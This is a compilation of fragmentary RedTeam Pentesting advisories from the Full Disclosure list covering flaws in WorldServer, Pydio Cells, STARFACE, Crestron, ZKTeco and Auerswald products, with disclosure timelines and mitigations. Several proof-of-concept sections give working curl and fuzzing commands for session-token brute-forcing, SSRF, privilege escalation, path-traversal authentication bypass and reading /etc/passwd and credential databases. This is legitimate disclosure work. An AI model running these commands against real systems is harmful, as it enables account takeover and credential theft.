[FD] [RT-SA-2023-001] Session Token Enumeration in RWS WorldServer

2023-07-19 Thread RedTeam Pentesting GmbH

Advisory: Session Token Enumeration in RWS WorldServer

Session tokens in RWS WorldServer have a low entropy and can be
enumerated, leading to unauthorised access to user sessions.


Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357


"WorldServer offers a flexible, enterprise-class translation management
system that automates translation tasks and greatly reduces the cost of
supporting large volumes of local language content."

(from the vendor's homepage)

More Details

WorldServer associates user sessions with numerical tokens, which always
are positive values below 2^31. The SOAP action "loginWithToken" allows
for a high amount of parallel attempts to check if a token is valid.
During analysis, many assigned tokens were found to be in the 7-digit
range of values. An attacker is therefore able to enumerate user
accounts in only a few hours.

Proof of Concept

In the following an example "loginWithToken" request is shown:

POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

http://www.w3.org/2001/XMLSchema-instance"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; 



It can be saved as file "login-soap.req" and be used as a request
template for the command-line HTTP enumerator monsoon [1] to achieve
many parallel requests:

$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \

Target URL: https://www.example.com/

 status   header body   valueextract

500  191  560   5829099
500  191  556   6229259
200  191 3702   7545136
500  191  556   9054984
processed 1200 HTTP requests in 2h38m38s
4 of 1200 requests shown, 1225 req/s

The --range parameter reflects the possible value range of 2^31 and for
each value an HTTP request is sent to the WorldServer SOAP API where the
FUZZ marker in the request template is replaced with the respective
value. Also responses are hidden which contain "InvalidSessionException"
as these sessions are invalid. Responses will yield a status code of 200
if an administrative session token is found. For an unprivileged user
session, status code 500 is returned.


Lower the rate at which requests can be issued, for example with a
frontend proxy.


According to the vendor, upgrading to versions above 11.8.0 resolves the

Security Risk

Attackers can efficiently enumerate session tokens. In a penetration
test, it was possible to get access to multiple user accounts, including
administrative accounts using this method in under three hours.
Additionally, by using such an administrative account it seems likely to
be possible to execute arbitrary code on the underlying server by
customising the REST API [2]. Thus, the vulnerability poses a high risk.


2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released


[1] https://github.com/RedTeamPentesting/monsoon

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to

[FD] [RT-SA-2022-004] STARFACE: Authentication with Password Hash Possible

2023-06-01 Thread RedTeam Pentesting GmbH
vulnerability was addressed with a temporary solution, such that the
password hashes are encrypted before they are saved in the database.
This approach prevents attackers from exploiting this vulnerability in
scenarios where they have only acquired pure database access. However,
attackers with system level access can bypass this temporary measure as
they can extract the encryption key and decrypt the hashes in the
database. A solution that fixes this vulnerability entirely is still in

Security Risk

The web interface and REST API of STARFACE allow to login using the
password hash instead of the cleartext password. This can be exploited
by attackers who gained access to the application's database where the
passwords are also saved as a SHA512 hash of the cleartext passwords.
While the precondition for this attack could be the full compromise of
the STARFACE PBX, another attack scenario could be that attackers
acquire access to backups of the database stored on another system.
Furthermore, the login via password hash allows attackers for permanent
unauthorised access to the web interface even if system access was
obtained only temporarily. Due to the prerequisites of obtaining access
to password hashes, the vulnerability poses a low risk only.


2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released


[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Alter Posthof 1   Fax : +49 241 510081-99
52062 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [RT-SA-2023-005] Pydio Cells: Server-Side Request Forgery

2023-05-30 Thread RedTeam Pentesting GmbH
For longer running processes, Pydio Cells allows for the creation of
jobs, which are run in the background. The job "remote-download" can be
used to cause the backend to send a HTTP GET request to a specified URL
and save the response to a new file. The response file is then available
in a user-specified folder in Pydio Cells.


Product: Pydio Cells
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750


"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)

More Details

Using the REST-API of Pydio Cells it is possible to start jobs. For
example, when renaming a file or folder an HTTP request similar to the
following is sent:

PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140

  "JobName": "move",

The body contains a JSON object with a job name and additional
parameters for the job. Besides the "move" job, also a job with the name
"remote-download" exists. It takes two additional parameters: "urls" and
"target". In the "urls" parameter, a list of URLs can be specified and in
the parameter "target" a path can be specified in which to save the
response. When the job is started, HTTP GET requests are sent from the
Pydio Cells server to the specified URLs. The responses are saved into a
file, which are uploaded to the specified folder within Pydio Cells.
Potential errors are transmitted in a WebSocket channel, which can be
opened through the "/ws/event" endpoint.

Proof of Concept

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
run the following commands to start a "remote-download" job to trigger
an HTTP request:

$ export JWT=""

$ echo '{"urls": ["http://localhost:8000/internal.html";], "target": 
"personal-files"}' \
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
| tee remote-download.json

$ curl --header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--request PUT \
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'

The URL in the JSON document specifies which URL to request. The "target"
field in the same document specifies into which folder the response is saved.
Afterwards, the response is contained in a file in the specified folder.
Potential errors are communicated through the WebSocket channel.


Limit the services which can be reached by the Pydio Cells server, for
example using an outbound firewall.


Upgrade Pydio Cells to a version without the vulnerability.

Security Risk

The risk is highly dependent on the environment in which the attacked
Pydio Cells instance runs. If there are any internal HTTP services which
expose sensitive data on the same machine or within the same network,
the server-side request forgery vulnerability could pose a significant
risk. In other circumstances, the risk could be negligible. Therefore,
overall the vulnerability is rated as a medium risk.


2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and 

[FD] [RT-SA-2023-004] Pydio Cells: Cross-Site Scripting via File Download

2023-05-30 Thread RedTeam Pentesting GmbH

The code has to be run in context of Pydio Cells while being logged in.
If the resulting URL is opened in a browser, the JavaScript code
contained in the HTML file is run. If the attack is conducted in the
described way, the JWT of the attacker is exposed through the URL.
However, this can be circumvented by first generating a public URL
for the file and then constructing the presigned URL based on the
resulting download URL.


No workaround known.


Upgrade Pydio Cells to a version without the vulnerability.

Security Risk

Attackers that can upload files to a Pydio Cells instance can construct
URLs that execute arbitrary JavaScript code in context of Pydio Cells
upon opening. This could for example be used to steal the authentication
tokens of users opening the URL. It is likely that such an attack
succeeds, since sharing URLs to files hosted using Pydio Cells is a
common use case of the application. Therefore, the vulnerability is
estimated to pose a high risk.


2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


[1] https://aws.amazon.com/sdk-for-javascript/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Alter Posthof 1   Fax : +49 241 510081-99
52062 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [RT-SA-2023-003] Pydio Cells: Unauthorised Role Assignments

2023-05-30 Thread RedTeam Pentesting GmbH
ot;foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json

  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
"profile": "shared"
  "Roles": [...]

Finally, the following curl command can be issued to create the new external

$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \

Now, login with the newly created user to access all cells and
non-personal workspaces.


Disallow the creation of external users in the authentication settings.


Upgrade Pydio Cells to a version without the vulnerability.

Security Risk

Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.


2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


[1] https://curl.se/
[2] https://stedolan.github.io/jq/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Alter Posthof 1   Fax : +49 241 510081-99
52062 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [RT-SA-2022-002] Skyhigh Security Secure Web Gateway: Cross-Site Scripting in Single Sign-On Plugin

2023-01-26 Thread RedTeam Pentesting GmbH
As mentioned above, the HTTP response body could also include JavaScript
code designed to interact with the domain specified in the URL resulting
in a cross-site scripting vulnerability.




According to the vendor, the vulnerability is mitigated in versions
10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not
verified by RedTeam Pentesting GmbH. The vendor's security bulletin can
be found at the following URL:


Security Risk

The vulnerability could be used to perform cross-site scripting attacks
against users of the SWG in context of any domain. Attackers only need
to convince users to open a prepared URL or visit an attacker's website
that could perform an automatic redirect to an exploit URL. This exposes
any website visited through the SWG to the various risks and
consequences of a cross-site scripting vulnerability such as account
takeover. As a result, this vulnerability poses a high risk.


2022-07-29 Vulnerability identified
2022-10-20 Customer approved disclosure to vendor
2022-10-20 Vulnerability was disclosed to the vendor
2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and
2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Alter Posthof 1   Fax : +49 241 510081-99
52062 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [RT-SA-2021-003] Missing Authentication in ZKTeco ZEM/ZMM Web Interface

2022-10-24 Thread RedTeam Pentesting GmbH
r-x root/root  0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root  0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root  0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root  0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root  0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root  54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root  33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root  0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/5130 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root  0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root  0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root  0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root  0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat

In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
the user database. The user database contains 72 byte user records, each
containing the privilege level, the PIN, the name of the user, data
stored on external authentication tokens like cards, and the group of
the user.

While the cookie value might be guessable, it is not used for
authentication purposes. An attacker with knowledge of the
corresponding URLs could access the user detail view or the backup
without any authentication.

Proof of Concept


Network access to the device should be limited to trustworthy persons.
This might be hard to implement if the device is installed in a public
space, especially if it is used for access control, too.


Currently, it is not known whether a newer version might fix this issue.
Due to the age of the product, the vendor might decide not to create a
fix at all.

Security Risk

Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
can get access to employee data, including the credentials used for
accessing the time attendance device. If these credentials are used for
other purposes than time attendance, such as physical access control,
attackers might use them to gain access to protected areas. The actual
risk estimate varies wildly with the kind of access control system in
place and whether network access to the device is prevented by other
means, such as nearby security guards. For this reason, missing
authentication to the ZEM/ZMM web interface is estimated to pose a medium
risk. This estimate might need to be adjusted to the specific use case
of the device.


2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Alter Posthof 1   Fax : +49 241 510081-99
52062 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [RT-SA-2021-009] Credential Disclosure in Web Interface of Crestron Device

2022-01-12 Thread RedTeam Pentesting GmbH
Advisory: Credential Disclosure in Web Interface of Crestron Device

When the administrative web interface of the Crestron HDMI switcher is
accessed unauthenticated, user credentials are disclosed which are valid
to authenticate to the web interface.


Product: Crestron HD-MD4X2-4K-E
Affected Versions:
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178


"Crestron sets the gold standard for network security by leveraging the
most advanced technologies including 802.1x authentication, AES
encryption, Active Directory® credential management, JITC Certification,
SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
provide network security at the product level."

(from the vendor's homepage)

More Details

Upon visiting the device's web interface using a web browser, a login
form is displayed requiring to enter username and password to
authenticate. The analysis of sent HTTP traffic revealed that in
addition to the loading of the website, a few more HTTP requests are
automatically triggered. One of the associated responses contains a
username and a password which can be used to authenticate as the
affected user.

Proof of Concept

Requesting the URL "http://crestron.example.com/"; via a web browser
results in multiple HTTP requests being sent. Among others, the
following URL is requested:


This request results in a response similar to the following:

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html

  "login_ur": 0,
  "front_val": [
  "uname": "admin",
  "upassword": "password"

The values for the keys "uname" and "upassword" could be used to
successfully authenticate to the web interface as the affected user.


Reachability over the network can be restricted for access to the web
interface, for example by using a firewall.


No fix known.

Security Risk

As user credentials are disclosed to visitors of the web interface they
can directly be used to authenticate to it. The access allows to modify
the device's input and output settings as well as to upload and install
new firmware. Due to ease of exploitation and gain of administrative
access this vulnerability poses a high risk.


2021-10-06 Vulnerability identified
2021-11-15 Customer approved disclosure to vendor
2021-12-08 Vendor notified
2021-12-15 Vendor notified again
2021-12-21 Vendor response received: "The device in question doesn't support
   Crestron's security practices. We recommend the HD-MD-4KZ 
2021-12-22 Requested confirmation, that the vulnerability will not be addressed.
2021-12-28 Vendor confirms that the vulnerability will not be corrected.
2022-01-12 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2021-007] Auerswald COMpact Multiple Backdoors

2021-12-06 Thread RedTeam Pentesting GmbH
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;



Disable or restrict access to the web-based management interface if


Upgrade to a firmware version which corrects this vulnerability.

Security Risk

By inspecting the firmware for the COMpact 5500R PBX, attackers can
easily discover two backdoor passwords. One password is for the secret
user account with the username "Schandelah", the other works as an
alternative password for the user "Admin". Using the backdoor, attackers
are granted access to the PBX with the highest privileges, enabling them
to completely compromise the device. The passwords are derived from the
serial number, the current date and the configured language.

The backdoor passwords are not documented. They secretly coexist with a
documented password recovery function supported by the vendor. No way
was found to disable the backdoor access.

All information needed to derive the passwords can be requested over the
network without authentication, so attackers only require network access
to the web-based management interface.

Due to the ease of exploitation and severe consequences, the backdoor
passwords are rated as a high risk.


2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be 
2021-12-06 Advisory published


[1] https://www.auerswald.de/de/support/download/firmware-compact-5500
[2] https://www.denx.de/wiki/U-Boot
[3] https://www.lighttpd.net
[4] https://ghidra-sre.org

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2021-006] Auerswald COMpact Arbitrary File Disclosure

2021-12-06 Thread RedTeam Pentesting GmbH
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \

HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: image/jpg; charset=UTF-8
Content-Length: 13986
Content-disposition: attachment; filename="logo1.jpg"

In a similar fashion as before, the file "/etc/passwd" can be accessed:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \

HTTP/1.1 200 OK


For attackers, an interesting file is the SQLite[2] database file
"/data/db/pbx4.db". It can be downloaded as follows:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
'' \
 > pbx4.db

  % Total% Received % Xferd  Average Speed   TimeTime Time  Current
 Dload  Upload   Total   SpentLeft  Speed
100  5120  100  51200 0  16253  0 --:--:-- --:--:-- --:--:-- 16305

This file contains the password for the highly privileged "Admin" user

$ sqlite3 pbx4.db
SQLite version 3.27.2 2019-02-25 16:06:06
Enter ".help" for usage hints.

sqlite> .tables
DbFileVersion  PbxMisc

sqlite> select * from PbxMisc;

The username and password can then be used to log into the web

$ curl --user 'Admin:S3kr1t!' --anyauth --include \

HTTP/1.1 200 OK
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/


Checking the access level reveals the new privilege:

$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;


The user "Admin", in contrast to regular administrative users
("sub-admin"), can access more functions and for example apply firmware


Disable or restrict access to the web-based management if possible.


Upgrade to a firmware version which corrects this vulnerability.

Security Risk

Attackers who already have acquired administrative access as a so-called
"sub-admin" can download a database file and access the password for the
highly privileged "Admin" account. This account can use more functions and
is allowed to apply firmware updates.

On the one hand, exploiting this vulnerability already requires
administrative access. On the other hand, attackers can reach
high-privileged access to the PBX and use functions not available to
"sub-admin" users, like firmware updates. All in all, this vulnerability
is therefore rated to have a medium risk potential.


2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be 
2021-12-06 Advisory published


[1] https://curl.se
[2] https://www.sqlite.org

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The re

[FD] [RT-SA-2021-005] Auerswald COMpact Privilege Escalation

2021-12-06 Thread RedTeam Pentesting GmbH
QBGDRFJB' --include \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;

{"rufnr":"123","name":"Example User",[...],
[...], "isSubadmin":0,[...]}

In the returned JSON document, the values of the fields for the PIN,
token and password are replaced by "XXX". But if the URL parameter
"passwd" is set to the value 1, the values are returned in plain text:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;

{"rufnr":"123","name":"Example User",[...],
"privatToken":"y",[...], "isSubadmin":0,[...]}

This can be repeated for other user accounts, for example for the
user account with the ID  shown it the listing earlier. The server
returns the plain text password for the other user account:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;

{"rufnr":"555","name":"sub-admin other user","privatPin":"",

The password can then be used to log into the PBX with the other user

$ curl --anyauth --user sub-admin:verysecretpassword --include \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/


Checking the access level with the new session ID shows that the user is
now logged in with an administrative account:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;



Disable or restrict access to the web-based management interface if


Upgrade to a firmware version which corrects this vulnerability.

Security Risk

Attackers who have acquired access to a low-privileged user account, for
example by extracting such an account from a VoIP phone, can log into
the web-based management interface of the COMpact 5500R PBX and access
clear text passwords for other user accounts, including those with the
"sub-admin" privilege. After logging in with these newly acquired
credentials, attackers can access configuration settings and most other

They can then for example create new SIP credentials and use them to
call premium rate phone lines they operate to generate revenue. They can
monitor and even redirect all incoming and outgoing phone calls and
record all Ethernet data traffic.

Due to the severe and far-reaching consequences and despite the
prerequisite of having to know an existing low-privilege user account,
this vulnerability rated as a high risk.


2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be 
2021-12-06 Advisory published


[1] https://curl.se/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks 

[FD] [RT-SA-2021-004] Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass

2021-12-06 Thread RedTeam Pentesting GmbH

The endpoint "/account" allows listing account data:

$ curl --include --path-as-is \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd

  "DATA": {
"accountList0": {
  "KEY": "accountList0",
  "COUNT": 1,
  "VALUE": {
"0": {
  "ID": 32327,
  "PARENTID": 0,
  "PROVIDER": "ProviderName",
  "NAME": "123 Example User",
  "STATUS": 4,
  "DEFAULT": 1

The ID 32327 can then be used to get details about that particular
account, including the username and password:

$ curl --include --path-as-is \

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd

  "DATA": {
"Benutzer": {
  "VALUE": "123",
  "KEY": "Benutzer"
"Passwort": {
  "VALUE": "secret",
  "KEY": "Passwort"

Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to
access and use the web-based management interface as if regular login
credentials were presented.

It is likely that other functionality can be accessed in the same way,
to for example change settings or activate the integrated option for
recording the Ethernet traffic.


Disable the web-based management interface if possible.


Upgrade to a firmware version which corrects this vulnerability.

Security Risk

Inserting the prefix "/about/../" allows bypassing the authentication
check for the web-based configuration management interface. This enables
attackers to gain access to the login credentials used for
authentication at the PBX, among other data.

Attackers can then authenticate at the PBX as the respective phone and
for example call premium rate phone lines they operate to generate
revenue. They can also configure a device they control as the PBX in the
phone, so all incoming and outgoing phone calls are intercepted and can
be recorded. The device also contains a function to record all Ethernet
data traffic, which is likely affected as well.

